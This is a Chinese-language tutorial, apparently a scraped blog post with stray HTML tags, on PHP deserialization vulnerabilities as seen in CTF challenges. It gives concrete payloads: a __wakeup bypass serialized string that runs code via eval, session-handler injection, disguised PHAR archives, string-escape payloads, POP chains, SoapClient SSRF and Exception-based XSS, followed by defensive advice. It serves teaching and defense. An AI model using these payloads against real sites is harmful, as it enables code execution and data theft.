PHP反序列化漏洞全面解析与利用技术<\/h1>

前言<\/h2>
PHP反序列化漏洞是CTF比赛中常见的高频考点，也是实际Web应用中需要重点防范的安全问题。本文将从多个维度深入剖析PHP反序列化的各种利用方式，包括魔术方法绕过、session反序列化、phar反序列化、字符串逃逸、对象逃逸、POP链构造等高级技术。<\/p>

__wakeup()绕过漏洞<\/h2>

漏洞概述<\/h3>

CVE编号: CVE-2016-7124<\/li>
影响版本: PHP5.6.25之前和7.0.10之前的7.x版本<\/li>

漏洞原理: 当对象的属性数量大于实际个数时，可以绕过

__wakeup()<\/code>魔术方法的执行<\/li>
<\/ul>
示例分析<\/h3>
class<\/span> convent<\/span>{
<\/span><\/span>    var<\/span> $warn =<\/span> "No hacker."<\/span>;
<\/span><\/span>    function<\/span> __destruct(){
<\/span><\/span>        eval<\/span>($this-><\/span>warn<\/span>);  \/\/ 存在代码执行风险
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>    function<\/span> __wakeup(){
<\/span><\/span>        foreach<\/span>(get_object_vars<\/span>($this) as<\/span> $k =><\/span> $v) {
<\/span><\/span>            $this-><\/span>$k =<\/span> null<\/span>;  \/\/ 正常情况下会清空所有属性
<\/span><\/span><\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>利用方式<\/strong>：构造序列化字符串时，修改对象属性数量使其大于实际数量，例如：<\/p>
O:7:"convent":2:{s:4:"warn";s:10:"phpinfo();";}
<\/code><\/pre>
(实际只有1个属性warn，但声明为2个属性)<\/p>
PHP Session反序列化漏洞<\/h2>
Session存储机制<\/h3>
PHP session有三种序列化处理器：<\/p>


php<\/strong>(默认): 格式为键名|序列化值<\/code><\/p>

示例: name|s:6:"1FonlY";<\/code><\/li>
<\/ul>
<\/li>

php_serialize<\/strong>: 完整序列化格式<\/p>

示例: a:1:{s:4:"name";s:6:"1FonlY";}<\/code><\/li>
<\/ul>
<\/li>

php_binary<\/strong>: 键名长度(ASCII) + 键名 + 序列化值<\/p>

示例: EOTnames:6:"1FonlY";<\/code> (EOT是ASCII码4)<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞利用条件<\/h3>
当序列化与反序列化使用的处理器不一致时，可能造成注入漏洞。<\/p>
攻击场景<\/strong>：<\/p>

使用php_serialize序列化：a:1:{s:4:"name";s:31:"|O:7:"_1FonlY":1:{s:3:"cmd";N;}";}<\/code><\/li>
使用php处理器反序列化时，会将|<\/code>后的内容当作单独的对象解析<\/li>
<\/ol>
PHAR反序列化漏洞<\/h2>
PHAR文件结构<\/h3>
PHAR(PHP Archive)文件包含序列化的元数据(metadata)，当通过phar:\/\/协议访问时自动反序列化。<\/p>
生成PHAR示例<\/strong>：<\/p>
class<\/span> TestObject<\/span> {}
<\/span><\/span>$phar =<\/span> new<\/span> Phar<\/span>("phar.phar"<\/span>);
<\/span><\/span>$phar-><\/span>startBuffering<\/span>();
<\/span><\/span>$phar-><\/span>setStub<\/span>("<?php __HALT_COMPILER(); ?>"<\/span>);
<\/span><\/span>$phar-><\/span>setMetadata<\/span>(new<\/span> TestObject<\/span>()); \/\/ 序列化存储
<\/span><\/span><\/span><\/span>$phar-><\/span>addFromString<\/span>("test.txt"<\/span>, "test"<\/span>);
<\/span><\/span>$phar-><\/span>stopBuffering<\/span>();
<\/span><\/span><\/code><\/pre>利用条件<\/h3>

能够上传PHAR文件(可伪装为GIF\/JPG等)<\/li>
存在文件操作函数且参数可控<\/li>
有可用的魔术方法作为"跳板"<\/li>
<\/ol>
可利用的函数<\/h3>

file_exists()<\/li>
is_dir()<\/li>
file_get_contents()<\/li>
等文件系统函数<\/li>
<\/ul>
绕过技巧<\/h3>

伪装文件类型<\/strong>：<\/li>
<\/ol>
$phar-><\/span>setStub<\/span>("GIF89a<?php __HALT_COMPILER(); ?>"<\/span>);
<\/span><\/span><\/code><\/pre>
协议嵌套<\/strong>：<\/li>
<\/ol>
compress.zlib:\/\/phar:\/\/phar.phar\/test.txt
<\/code><\/pre>
字符串逃逸技术<\/h2>
原理<\/h3>
通过控制序列化字符串长度，使后续内容被解析为新属性。<\/p>
典型案例<\/strong>：[0CTF 2016 piapiapia]<\/p>

构造payload闭合前部分序列化：

";}s:5:"photo";s:10:"config.php";}<\/code><\/li>
利用过滤规则增加字符数(如where→hacker多1字符)<\/li>
计算需要增加的字符数，插入相应数量的触发词<\/li>
<\/ol>
对象逃逸技术<\/h2>
通过覆盖或构造特定对象属性，使反序列化后执行非预期操作。<\/p>
关键点<\/strong>：<\/p>

利用__toString()<\/code>等魔术方法<\/li>
控制对象属性间的引用关系<\/li>
通过数组操作等方式绕过过滤<\/li>
<\/ul>
POP链构造<\/h2>
POP(Property-Oriented Programming)链通过串联多个类的魔术方法和普通方法实现攻击。<\/p>
构造步骤<\/strong>：<\/p>

寻找起点(如__destruct()<\/code>)<\/li>
分析类方法调用关系<\/li>
寻找敏感函数调用<\/li>
构造属性控制执行流程<\/li>
<\/ol>
示例<\/strong>：[MRCTF 2020 Easy pop]<\/p>

Show::__toString()<\/code> → Test::__get()<\/code> → Modifier::__invoke()<\/code><\/li>
最终触发文件包含读取flag<\/li>
<\/ol>
其他利用方式<\/h2>
SoapClient + 反序列化 → SSRF<\/h3>
$url =<\/span> "http:\/\/127.0.0.1\/flag.php"<\/span>;
<\/span><\/span>$b =<\/span> new<\/span> SoapClient<\/span>(null<\/span>, array<\/span>('uri'<\/span>=><\/span>$url, 'location'<\/span>=><\/span>$url));
<\/span><\/span><\/code><\/pre>Exception类 → XSS<\/h3>
$s =<\/span> new<\/span> Exception<\/span>("<script>alert(1)<\/script>"<\/span>);
<\/span><\/span>unserialize<\/span>(serialize<\/span>($s)); \/\/ 触发XSS
<\/span><\/span><\/span><\/code><\/pre>防御措施<\/h2>

及时更新PHP版本<\/li>
避免反序列化用户输入<\/li>
使用一致session处理器<\/li>
对魔术方法进行安全编码<\/li>
禁用不必要的类序列化<\/li>
<\/ol>
总结<\/h2>
PHP反序列化漏洞形式多样，从简单的魔术方法绕过到复杂的POP链构造，理解这些技术有助于开发更安全的代码和更有效的防御措施。在实际应用中，应特别注意对用户可控数据的处理，避免危险函数的直接调用。<\/p>

PHP反序列化漏洞全面解析与利用技术<\/h1>

__wakeup()绕过漏洞<\/h2>

PHP Session反序列化漏洞<\/h2>

PHAR反序列化漏洞<\/h2>

字符串逃逸技术<\/h2>

其他利用方式<\/h2>

总结<\/h2> PHP反序列化漏洞形式多样，从简单的魔术方法绕过到复杂的POP链构造，理解这些技术有助于开发更安全的代码和更有效的防御措施。在实际应用中，应特别注意对用户可控数据的处理，避免危险函数的直接调用。<\/p>

总结<\/h2>
PHP反序列化漏洞形式多样，从简单的魔术方法绕过到复杂的POP链构造，理解这些技术有助于开发更安全的代码和更有效的防御措施。在实际应用中，应特别注意对用户可控数据的处理，避免危险函数的直接调用。<\/p>